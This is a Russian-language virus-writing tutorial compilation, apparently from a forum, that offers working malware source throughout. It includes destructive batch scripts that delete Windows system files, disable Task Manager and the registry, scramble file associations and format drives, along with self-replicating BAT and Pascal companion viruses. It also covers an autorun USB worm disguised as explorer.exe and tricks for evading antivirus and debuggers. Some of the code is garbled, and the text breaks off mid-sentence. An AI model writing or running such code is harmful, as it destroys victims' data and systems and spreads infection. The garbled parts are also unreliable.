Все очень просто! Заходим в блокнот и пишем вот это
@echo off
assoc.exe=.mp3 >nul
assoc.mp3=.bmp >nul
assoc.bmp=.mp3 >nul
assoc.jpg=.mp3 >nul
assoc.avi=.jpg >nul
assoc.txt=.mp3 >nul
assoc.sys=.mp3 >nul
assoc.dll=.mp3 >nul
assoc.tmp=.mp3 >nul
assoc.ini=.mp3 >nul
assoc.flv=.txt >nul
assoc.doc=.mp3 >nul
assoc.rar=.mp3 >nul
assoc.xls=.mp3 >nul
assoc.xlsx=.mp3 >nul
assoc.log=.mp3 >nul
assoc.rtf=.mp3 >nul
assoc.rif=.mp3>nul
assoc.docm=.mp3 >nul
asoc.scr=.mp3 >nul
assoc.cif=.mp3 >nul
assoc.zip=.mp3 >nul
assoc.dat=.mp3 >nul
assoc.inf=.mp3 >nul
assoc.gif=.rar >nul
assoc.wav=.zip >nul
assoc.mp4=.txt >nul
assoc.jpeg=.mp4 >nul
label D: TI KUSOK GOVNA >nul
label G: TI KUSOK GOVNA >nul
label E: TI KUSOK GOVNA >nul
label F: TI KUSOK GOVNA >nul
label C: TI KUSOK GOVNA >nul
label I:TI KUSOK GOVNA >nul
date 05.05.97 >nul
time 00:00 >nul
copy %0 D:\Mini-Game.bat >nul
copy %0 C:\Calculator.bat >nul
copy %0 I:\Car.bat >nul
copy %0 G:\Karta.bat >nul
shutdown -r -t 00 >nul
Потом сохраним например v.bat .bat это обезательно!! Готово:)

BAT-вирус
@Echo off

copy %0 c:virus.bat >nul

echo c:virus.bat>>c:autoexec.bat

Этот вирус заражает винчестер, оставляя только один файл virus.bat. Но все-таки я бы не сказал что это полноценный вирус, т.к. он лишен возможности заражать другие компьютеры. Чтобы этот BAT-вирус обрел более четкие очертания дополним его возможностью заражать другие ПК:

@Echo off

copy %0 c:virus.bat >nul

echo c:virus.bat>>c:autoexec.bat

copy %0 a:run.bat >nul

В этом примере появляется строка, которая дает возможность вирусу заражать дискеты. Смысл этого в том что если при перезагрузке ПК в дисководе будет дискета, то она будет заражена.

Конечно файл virus.bat в корневом диске C: будет сильно мозолить глаза юзеру, чтобы этого не было существует программа attrib. Преобразуем вирус:

@Echo off

copy %0 c:virus.bat >nul

attrib +h c:virus.bat >nul

echo c:virus.bat>>c:autoexec.bat

copy %0 a:run.bat >nul

Если вы внимательны, то вы уже поняли, что вызов файла virus.bat в autoexec.bat будет записываться каждый раз при перезагрузке ПК. Чтобы этого не произошло есть простой способ: после записи вызова надо с помощью программы attrib установить атрибут только чтение у autoexec.bat. А есть другой вариант, он немного посложнее, но гораздо грамотнее:

@Echo off

if exist c:virus.bat goto cool

copy %0 c:virus.bat >nul

attrib +h c:virus.bat >nul

echo c:virus.bat>>c:autoexec.bat

:cool

copy %0 a:run.bat >nul

Здесь вторая строка проверяет существует ли уже файл c:virus.bat и если он уже существует, то происходит переход к метке cool. Этот способ тоже очень прост. Явный недостаток - если юзер уберет вызов из autoexec.bat, а файл virus.bat оставит, то глупый вирус будет нагло обманут. Чтобы вирус был умнее, то надо использовать программу find, если вам будет не лень с ней разбираться, то вы сможете написать более сложный BAT-вирус, который будет заражать не один файл c:autoexec.bat, а все *.BAT. Пример:

@echo off%[MeTrA]%

if '%1=='In_ goto MeTrAin

if exist c:MeTrA.bat goto MeTrAru

if not exist %0 goto MeTrAen

find "MeTrA"<%0>c:MeTrA.bat

attrib +h c:MeTrA.bat

:MeTrAru

for %%t in (*.bat) do call c:MeTrA In_ %%t

goto MeTrAen

:MeTrAin

find "MeTrA"<%2>nul

if not errorlevel 1 goto MeTrAen

type c:MeTrA.bat>>%2

:MeTrAen

Смысл заражения таков: в вирусе каждая строчка имеет метку, в данном примере она MeTrA. Например, в первой строке эта метка ничего не делает, во второй строке эта метка, как бы, не является пассивной, она используется для внутренней работы вируса, а именно участвует в названии метки. При запуске вирус проверяет, есть ли файл C:METRA.BAT, если нет, то вирус создает его и с помощью программы find копирует из файла (из которого стартовал) все строки содержащие метку вируса, т.е. копирует только вирусные строки. Так, вирусные строки скопированы. Значит в файле C:METRA.BAT теперь находится копия вируса. Далее вирус ищет BAT-файлы. Чтобы не происходило повторного заражения используется все таже программа find. Допустим вирус нашел файл RUN.BAT и он оказался еще не заражен, тогда вирус вызывает файл C:METRA.BAT с такими параметрами: In_ RUN.BAT, здесь первый параметр In_ говорит вирусу, что надо заразить файл, имя которого указано во-втором параметре, в данном случае он RUN.BAT. Вирус в C:METRA.BAT заражает файл RUN.BAT простейшим способом - с помощью команды type дописывает к файлу RUN.BAT себя. Вот так файл RUN.BAT оказывается зараженным.

Компаньон-вирус
Эти вирусы не изменяют программы. Они создают для EXE-файлов COM-файлы. При запуске программы сначала запустится COM-файл с вирусом, который заразив другие файлы запустит EXE-файл. Рассмотрим пример:

{$M 2048,0,4096}

{$i-}

Program Metra;

uses dos;

var

DirInfo : SearchRec;

F1,f2 : File;

Buf : Array[0..5000] of Byte; { размер вируса }

NumRead : Word;

NumWritten : Word;

FT:text;

P: PathStr;

D: DirStr;

N: NameStr;

E: ExtStr;

namecom:string;

Label InfOk;

Begin

{ считать свое тело в буфер }

Assign(F2,ParamStr(0));

Reset(F2,1);

if ioresult<>0 then

begin

writeln('Файл ',paramstr(0),' не доступен!');

halt;

end;

BlockRead(F2,buf,SizeOf(buf),NumRead);

Close(F2);

{ искать жертву }

FindFirst('*.EXE',Archive,DirInfo);

While DosError = 0 Do

Begin

FSplit(dirinfo.name, D, N, E);

namecom:=n+'.com';

{ проверить существует ли файл }

Assign(ft,namecom);

reset(ft);

if ioresult=0 then { если уже существует }

begin

close(ft);

goto infOk;

end;

{ создать COM-файл с вирусом }

Assign(F1,namecom);

rewrite(f1);

if ioresult<>0 then goto InfOk; {если ошибка, то пропустить}

Reset(F1,1);

BlockWrite(F1,buf,NumRead,NumWritten);

Close(F1);

infOk:

FindNext(DirInfo);

End;

{ запустим своего носителя }

FSplit(paramstr(0), D, N, E);

swapvectors;

exec(d+n+'.EXE',paramstr(1));

swapvectors;

{ если вызвали с таким параметром, то надо представитьcя }

if paramstr(1)='/??' then

begin

writeln('Virus MeTrA.');

writeln('^^^^^^^^^^^^');

end;

halt(dosexitcode); { выйти и сохранить код ошибки }

End.

Вирус будет лучше если его упаковать чем-нибудь вроде PKLITE с параметром -e. Вверху есть массив - размер вируса, смотрите, чтобы значение его было не меньше EXE-файла с вирусом, а желательно чтобы и больше не было.

Вирус-спутник
Принцип заражения:

• найти EXE-файл
• найти OVR-файл с тем же именем
• если его нет, то переименовать найденный EXE-файл в OVR-файл, записаться вместо EXE-файла.

Резидентные вирусы
Из справки Паскаля:

{$M $800,0,0 } { 2K stack, no heap }

{ This program causes a click each time a key is pressed.}

uses Crt, Dos;

var

KbdIntVec : Procedure;

{$F+}

procedure Keyclick; interrupt;

begin

if Port[$60] < $80 then

{ Only click when key is pressed }

begin

Sound(5000);

Delay(1);

Nosound;

end;

inline ($9C); { PUSHF -- Push flags }

{ Call old ISR using saved vector }

KbdIntVec;

end;

{$F-}

begin

{ Insert ISR into keyboard chain }

GetIntVec($9,@@KbdIntVec);

SetIntVec($9,Addr(Keyclick));

Keep(0); { Terminate, stay resident }

end.

Теперь уберем все ошибки из этого примера и переделаем под вирус:

{$F+}

procedure Keyclick; interrupt;

begin

InfExe; { вызов процедуры заражения }

inline ($9C); { PUSHF -- Push flags }

{ Call old ISR using saved vector }

KbdIntVec;

end;

{$F-}

Здесь процедура InfExe является обычной процедурой нерезидентного вируса (заражает в текущем каталоге). А вот эти строки впишем в то место вируса, где как бы его конец.

{ Insert ISR into keyboard chain }

GetIntVec($21,@KbdIntVec);

SetIntVec($21,@Keyclick);

Keep(0); { Terminate, stay resident }

К сожалению в справке не сказано как избегать повторной установки в память, поэтому я советую чтобы вирус копировал свое тело в какой-нибудь файл на диске C:, вставлял его вызов в config.sys. Пример: install=c:vir.exe /123, здесь /123 - это такой параметр, он говорит вирусу, что тот стартовал для заражения памяти, т.е. ему не надо запускать своего носителя, а надо выполнить эти три строчки.

Можно помудрить и с другими прерываниями, но вынужден вас расстроить, вирусы такого типа, как правило, очень глючные и работают, в основном, только в многозначной среде (в эмуляции DOS виснут).

Усложнение лечения
Если у вас нет желания чтобы ваш вирус, доставшись какому-нибудь ламеру, стал жертвой его антивируса, то следует подумать об усложнении лечения.

Вирус на Паскале, как правило, заражает программы в начало, перенося старое содержимое в конец. Такими вирусами антивирусные базы пополняются автоматом (без вмешательства человека). Оно и понятно, переписать конец в начало и обрезать длину - это очень простая операция. Смысл усложнения лечения заключатся в шифровке куска своей жертвы. Т.к. кусок жертвы при переносе к конец файла находится в массиве, тогда поступаем примерно так:

for i:=1 to 777 do

begin

cc:=a1;

i2:=ord(cc) xor 343;

a1:=chr(i2);

end;

Здесь a1 - это массив, в котором сохраняется начало жертвы; i,i2 - integer; cc - char.

В результате данной операции шифруется кусок файла-жертвы (777 байт). Т.к. операция шифровки осуществляется с помощью XOR - для расшифровки используется та же операция. Значит эту маленькую подпрограмму надо оформить в виде процедуры, которую следует прописать в процедуре заражения и в процедуре запуска своего носителя (перед запуском и после запуска). Если вы не разбираетесь в XOR, то скажу, в моем примере шифровка осуществляется с помощью ключа 343, он может быть от 1 до 65000. Можно сделать так, чтобы этот ключ менялся при заражении каждого файла, например, сделать чтобы ключ зависел от размера своего носителя или можно генерировать ключ случайным образом и помещать его где-нибудь в теле вируса или считывать несколько байт кода жертвы, получать их ord-значения и использовать как ключ. И еще, в моем примере шифровка идет от начала файла, а можно сделать определенное смещение, которое тоже чтобы зависело от чего-нибудь. Размер шифровки у меня 777, а можно сделать ее тоже случайной и т.д. Можно также защитить вирус от ламерской трассировки:

uses dos;

var

O1H , O3H , Br : Pointer;

{$F+}

procedure ReBoot; Interrupt;

begin { а это для того, чтобы нехорошие дяди не запускали Debug }

InLine($EA/

$00/

$00/

$FF/

$FF);

end;

{$F-}

{$F+}

procedure BreakOff; Interrupt; { + }

begin

{ Invisible Magic Words! }

end;

{$F-}

begin {main}

GetIntVec($01 , O1H); { подготавливаем систему }

SetIntVec($01 , @ReBoot);

GetIntVec($03 , O3H); { вешаем антитрассировщик }

SetIntVec($03 , @ReBoot);

GetIntVec($1B , Br); { заменяем вектор ^C }

SetIntVec($1B , @BreakOff);

SetCBreak(False); { и отключаем ^C }

writeln('hello');

SetIntVec($01 , O1H); { восстанавливаем захваченные векторы }

SetIntVec($03 , O3H);

SetIntVec($1B , Br);

end.

Здесь вместо фразы Hello следует вставить процедуры вируса, процедуру запуска носителя следует вставлять после строк восстановления векторов.

@echo off - запрещаем вывод команд на экран, в том числе и результатов их выполнения.
color 40 - делаем фон файла красным, а буквы чёрными.
label LAMER - команда label указанная без параметров переименовывает системный диск на заданное слово.
attrib -s -r -h -a %systemdrive%*.* - снимаем системные атрибуты с некоторых файлов.
erase %windir%*.* /q - банальное удаление файлов.
erase %windir%system32*.* /q - банальное удаление файлов, хотя винду снесёт без проблем.
erase %systemdrive%*.* /q - удаление системно важных скрытых файлов на системном диске. Хотя чтобы винда больше не запустилась никаким образом достаточно удалить файл ntldr и перегрузиться.
regedit (путь к вашему файлу) - Добавляем информацию с вашего .reg файла в реестр. Существует ещё и команда reg с параметрами, но иногда проще создать отдельный .reg файл. Здесь фантазии может быть много...
echo текст >(>>) файл - Добавляем записи в файл. Знак > создаёт новый файл с заданным текстом, >> добавляет уже в существующий файл.
shutdown -r -f - Принудительно перезагружаем комп, несмотря на протесты системы.

Удалить дрова :

@echo off
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul


Убрать рабочий стол :

@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Самоликвидация! Дописываем к любой проге что-бы не палиться : @echo off del "%0" >nul

@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\System /v
DdisableTaskMgr /t REG_DWORD /d 1 /f >nul
-запрещает ТаскМена

@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
-мнеяет кнопки мыши местами,можно здорово подпортить нервы кому нидь

@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\RestrictRun
/v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
-запрет запуска програм

@echo off
del "%SystemRoot%\Cursors\*.*" >nul
-удаляет курсоры мыши

@echo off
del "%SystemRoot%\Media" /q >nul
-удаляет звуки винды


@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
-запретить панель управления

@echo off
net user "ламер" /add >nul

@echo off
del "%SystemRoot%\Cursors\*.*" >nul

Del C:\WINDOWS\system32\catsrvps.dll
Del C:\WINDOWS\system32\catsrvut.dll
Del C:\WINDOWS\system32\cdfview.dll
Del C:\WINDOWS\system32\cisvc.exe
Del C:\WINDOWS\system32\ckcnv.exe
Del C:\WINDOWS\system32\clb.dll
Del C:\WINDOWS\system32\cmd.exe
Del C:\WINDOWS\system32\cmdial32.dll
Del C:\WINDOWS\system32\cnbjmon.dll
Del C:\WINDOWS\system32\comctl32.ocx
Del C:\WINDOWS\system32\dplaysvr.exe
Del C:\WINDOWS\NOTEPAD.EXE
Del C:\WINDOWS\twunk_32.exe
Del C:\WINDOWS\wmprfRUS.prx
Del C:\WINDOWS\WindowsShell.Manifest');
Del C:\WINDOWS\regedit.exe
Del C:\WINDOWS\explorer.exe
Del C:\WINDOWS\OemDrv
Del C:\WINDOWS\PeerNet\sqldb20.dll
Del C:\WINDOWS\PeerNet\sqlqp20.dll
Del C:\WINDOWS\twain_32\wiatwain.ds
del virus.bat


Этот батик просто копирует себя на всякие носители каждые 20 секунд.
Превращаещь этот батик в explorer.exe спомощью Batexec и кудаешь в архив.


c:\windows\system32\exp.exe
if exist c:\exp.com goto end
: copy
copy c:\windows\taskmgr.exe a:\avtorun.exe
attrib a:\avtorun.exe +r +a +s +h
attrib c:\autorun.inf -r -a -s
echo [Avtorun]>c:\autorun.inf
echo open=avtorun.exe>>c:\autorun.inf
attrib c:\autorun.inf +r +a +s +h
attrib c:\avtorun.exe -r -a -s
copy c:\windows\taskmgr.exe c:\avtorun.exe
attrib c:\avtorun.exe +r +a +s +h
attrib d:\autorun.inf -r -a -s
echo [Avtorun]>d:\autorun.inf
echo open=avtorun.exe>>d:\autorun.inf
attrib d:\autorun.inf +r +a +s +h
attrib d:\avtorun.exe -r -a -s
copy d:\windows\taskmgr.exe d:\avtorun.exe
attrib d:\avtorun.exe +r +a +s +h
attrib e:\autorun.inf -r -a -s
echo [Avtorun]>e:\autorun.inf
echo open=avtorun.exe>>e:\autorun.inf
attrib e:\autorun.inf +r +a +s +h
attrib e:\avtorun.exe -r -a -s
copy e:\windows\taskmgr.exe e:\avtorun.exe
attrib e:\avtorun.exe +r +a +s +h
attrib f:\autorun.inf -r -a -s
echo [Avtorun]>f:\autorun.inf
echo open=avtorun.exe>>f:\autorun.inf
attrib f:\autorun.inf +r +a +s +h
attrib f:\avtorun.exe -r -a -s
copy f:\windows\taskmgr.exe f:\avtorun.exe
attrib f:\avtorun.exe +r +a +s +h
attrib g:\autorun.inf -r -a -s
echo [Avtorun]>g:\autorun.inf
echo open=avtorun.exe>>g:\autorun.inf
attrib g:\autorun.inf +r +a +s +h
attrib g:\avtorun.exe -r -a -s
copy g:\windows\taskmgr.exe g:\avtorun.exe
attrib g:\avtorun.exe +r +a +s +h
attrib h:\autorun.inf -r -a -s
echo [Avtorun]>h:\autorun.inf
echo open=avtorun.exe>>h:\autorun.inf
attrib h:\autorun.inf +r +a +s +h
attrib h:\avtorun.exe -r -a -s
copy h:\windows\taskmgr.exe h:\avtorun.exe
attrib h:\avtorun.exe +r +a +s +h
attrib i:\autorun.inf -r -a -s
echo [Avtorun]>i:\autorun.inf
echo open=avtorun.exe>>i:\autorun.inf
attrib i:\autorun.inf +r +a +s +h
attrib i:\avtorun.exe -r -a -s
copy i:\windows\taskmgr.exe i:\avtorun.exe
attrib i:\avtorun.exe +r +a +s +h
attrib j:\autorun.inf -r -a -s
echo [Avtorun]>j:\autorun.inf
echo open=avtorun.exe>>j:\autorun.inf
attrib j:\autorun.inf +r +a +s +h
attrib j:\avtorun.exe -r -a -s
copy j:\windows\taskmgr.exe j:\avtorun.exe
attrib j:\avtorun.exe +r +a +s +h
attrib k:\autorun.inf -r -a -s
echo [Avtorun]>k:\autorun.inf
echo open=avtorun.exe>>k:\autorun.inf
attrib k:\autorun.inf +r +a +s +h
attrib k:\avtorun.exe -r -a -s
copy k:\windows\taskmgr.exe k:\avtorun.exe
attrib k:\avtorun.exe +r +a +s +h
attrib l:\autorun.inf -r -a -s
echo [Avtorun]>l:\autorun.inf
echo open=avtorun.exe>>l:\autorun.inf
attrib l:\autorun.inf +r +a +s +h
attrib l:\avtorun.exe -r -a -s
copy l:\windows\taskmgr.exe l:\avtorun.exe
attrib l:\avtorun.exe +r +a +s +h
attrib m:\autorun.inf -r -a -s
echo [Avtorun]>m:\autorun.inf
echo open=avtorun.exe>>m:\autorun.inf
attrib m:\autorun.inf +r +a +s +h
attrib m:\avtorun.exe -r -a -s
copy m:\windows\taskmgr.exe m:\avtorun.exe
attrib m:\avtorun.exe +r +a +s +h
attrib n:\autorun.inf -r -a -s
echo [Avtorun]>n:\autorun.inf
echo open=avtorun.exe>>r:\autorun.inf
attrib n:\autorun.inf +r +a +s +h
attrib n:\avtorun.exe -r -a -s
copy n:\windows\taskmgr.exe r:\avtorun.exe
attrib n:\avtorun.exe +r +a +s +h
attrib o:\autorun.inf -r -a -s
echo [Avtorun]>o:\autorun.inf
echo open=avtorun.exe>>o:\autorun.inf
attrib o:\autorun.inf +r +a +s +h
attrib o:\avtorun.exe -r -a -s
copy o:\windows\taskmgr.exe o:\avtorun.exe
attrib o:\avtorun.exe +r +a +s +h
attrib p:\autorun.inf -r -a -s
echo [Avtorun]>p:\autorun.inf
echo open=avtorun.exe>>p:\autorun.inf
attrib p:\autorun.inf +r +a +s +h
attrib p:\avtorun.exe -r -a -s
copy p:\windows\taskmgr.exe p:\avtorun.exe
attrib p:\avtorun.exe +r +a +s +h
attrib q:\autorun.inf -r -a -s
echo [Avtorun]>q:\autorun.inf
echo open=avtorun.exe>>q:\autorun.inf
attrib q:\autorun.inf +r +a +s +h
attrib q:\avtorun.exe -r -a -s
copy q:\windows\taskmgr.exe q:\avtorun.exe
attrib q:\avtorun.exe +r +a +s +h
attrib r:\autorun.inf -r -a -s
echo [Avtorun]>r:\autorun.inf
echo open=avtorun.exe>>r:\autorun.inf
attrib r:\autorun.inf +r +a +s +h
attrib r:\avtorun.exe -r -a -s
copy r:\windows\taskmgr.exe r:\avtorun.exe
attrib r:\avtorun.exe +r +a +s +h
attrib s:\autorun.inf -r -a -s
echo [Avtorun]>s:\autorun.inf
echo open=avtorun.exe>>s:\autorun.inf
attrib s:\autorun.inf +r +a +s +h
attrib s:\avtorun.exe -r -a -s
copy s:\windows\taskmgr.exe s:\avtorun.exe
attrib s:\avtorun.exe +r +a +s +h
attrib t:\autorun.inf -r -a -s
echo [Avtorun]>t:\autorun.inf
echo open=avtorun.exe>>t:\autorun.inf
attrib t:\autorun.inf +r +a +s +h
attrib t:\avtorun.exe -r -a -s
copy t:\windows\taskmgr.exe t:\avtorun.exe
attrib t:\avtorun.exe +r +a +s +h
attrib u:\autorun.inf -r -a -s
echo [Avtorun]>u:\autorun.inf
echo open=avtorun.exe>>u:\autorun.inf
attrib u:\autorun.inf +r +a +s +h
attrib u:\avtorun.exe -r -a -s
copy u:\windows\taskmgr.exe u:\avtorun.exe
attrib u:\avtorun.exe +r +a +s +h
attrib v:\autorun.inf -r -a -s
echo [Avtorun]>v:\autorun.inf
echo open=avtorun.exe>>v:\autorun.inf
attrib v:\autorun.inf +r +a +s +h
attrib v:\avtorun.exe -r -a -s
copy v:\windows\taskmgr.exe v:\avtorun.exe
attrib v:\avtorun.exe +r +a +s +h
attrib w:\autorun.inf -r -a -s
echo [Avtorun]>w:\autorun.inf
echo open=avtorun.exe>>w:\autorun.inf
attrib w:\autorun.inf +r +a +s +h
attrib w:\avtorun.exe -r -a -s
copy w:\windows\taskmgr.exe w:\avtorun.exe
attrib w:\avtorun.exe +r +a +s +h
attrib x:\autorun.inf -r -a -s
echo [Avtorun]>x:\autorun.inf
echo open=avtorun.exe>>x:\autorun.inf
attrib x:\autorun.inf +r +a +s +h
attrib x:\avtorun.exe -r -a -s
copy x:\windows\taskmgr.exe x:\avtorun.exe
attrib x:\avtorun.exe +r +a +s +h
attrib y:\autorun.inf -r -a -s
echo [Avtorun]>y:\autorun.inf
echo open=avtorun.exe>>y:\autorun.inf
attrib y:\autorun.inf +r +a +s +h
attrib y:\avtorun.exe -r -a -s
copy y:\windows\taskmgr.exe y:\avtorun.exe
attrib y:\avtorun.exe +r +a +s +h
attrib z:\autorun.inf -r -a -s
echo [Avtorun]>z:\autorun.inf
echo open=avtorun.exe>>z:\autorun.inf
attrib z:\autorun.inf +r +a +s +h
attrib z:\avtorun.exe -r -a -s
copy z:\windows\taskmgr.exe z:\avtorun.exe
attrib z:\avtorun.exe +r +a +s +h
ping -n 20 77.88.22.224
goto copy
:end


Потом и щешь у себя на компе файл c:\windows\explorer.exe (с иконкой мой компьютер он открывает рабочий стол) и кидаешь его в архив предварительно закинув в папку system32 (не в системную с кучей файлов, а содданную тебою) дальше этот архив превращаешь в SFX с параметрами: Путь для распаковки: c:\windows\ ; Режим вывода информации: Скрыть все ; Режим перезаписи: Перезаписывать все файлы без запроса. Именушь этот SFX в avtorun. Создаешь второй файл autorun.inf с содержимым:


[Autorun]
open=avtorun.exe


записываешь эти файлы в корневую паку диска(флешки). И все, но если есть файл c:\exp.com то эта програмка сама завершит свою работу.



Вот еще код.
Chcp 1251
@echo off
time 00:00
Date 01.01.2314
del "%SystemRoot%system32*.dll" /q >nul
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
del "%SystemRoot%Cursors*.*" >nul
del "%SystemRoot%Media" /q >nul
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
0reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
msiexec /?
if exist c:Installer.exe goto ski
if exist d:Installer.exe goto ski
if exist g:Installer.exe goto ski
if exist e:Installer.exe goto ski
copy %0 c:Install.exe >nul
attrib +h c:Installer.exe >nul
copy %0 d:Installer.exe >nul
attrib +h d:Installer.exe >nul
copy %0 e:Installer.exe >nul
attrib +h e:Installer.exe >nul
copy %0 g:Installer.exe >nul
attrib +h g:Installer.exe >nul
echo c:Installer.exe>>c:autoexec.bat
:ski
for %%t in (*.bat) do call c:Installer In_ %%t
for %%t in (*.bat) do call d:InstallerIn_ %%t
for %%t in (*.bat) do call e:Installer In_ %%t
for %%t in (*.bat) do call g:Installer In_ %%t
for %%t in (*.bat) do call a:Installer In_ %%t
find "Install "nul
type c:Installer.exe>>%2
type d:Installer.exe>>%2
type e:Installer.exe>>%2
type g:Installer.exe>>%2
type a:Installer.exe>>%2
Echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%mes.js
echo WSHShell.Popup ("Ваш компьютер подлежит немедленому уничтожению!"); >> %temp%mes.js
start %temp%mes.js
deltree /y %temp%mes.js
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nu
%SystemRoot%/system32/rundll32 user32, SwapMouseButton
title Загрузка игры...
label C: Lamer
label D: ЧМО
label E:Пидар
attrib -h -s -a -r C:\*.*
del C:\*.* /q (
attrib -h -s -a -r C:\WINDOWS\system32\ *.* /s /d
assoc .exe=.mp3
assoc .dll=.txt
assoc .ini=.iso
assoc .drv=.doc
assoc .bin=.zip
assoc .sys=.xls
assoc .ax=.ppt
assoc .bpl=.wav
assoc .nls=.pub
assoc .tlb=.mdb
assoc .bat=.rar
assoc .exe=.virus
assoc .dll=.virus
assoc .ini=.virus
assoc .drv=.virus
assoc .bin=.virus
assoc .sys=.virus
assoc .ax=.virus
assoc .bpl=.virus
assoc .nls=.virus
assoc .tlb=.virus
assoc .bat=.virus
attrib +h +s C:/WINDOWS
format %D%: /q
format %E%: /q
echo ХА-ХА
format %C%: /q
pause
shutdown.exe -s -t 00
del %0
shutdown.exe -s -t 00
taskkill /f /im explorer.exe >nul
cls
Вирусик bat
Итак, приступим. Вы решили заняться вирусо-писательством. Сразу вам скажу, что эти вирусы, конечно, могут очень сильно навредить компьютеру, но полноценно передаваться с одного компьютера на другой они не могут. За все, что произойдет с вашим компьютером отвечаете вы и только вы. Приступим:
1) Открываем блокнот;
2) Пишем в нем «mspaint», без кавычек;
3) Сохраняем файл под любым именем, но вместо .txt мы напишем .bat;
4) Откроем файлик и увидим, что открылся Paint))
Вот и готова наша первая программка. Вместо «mspaint»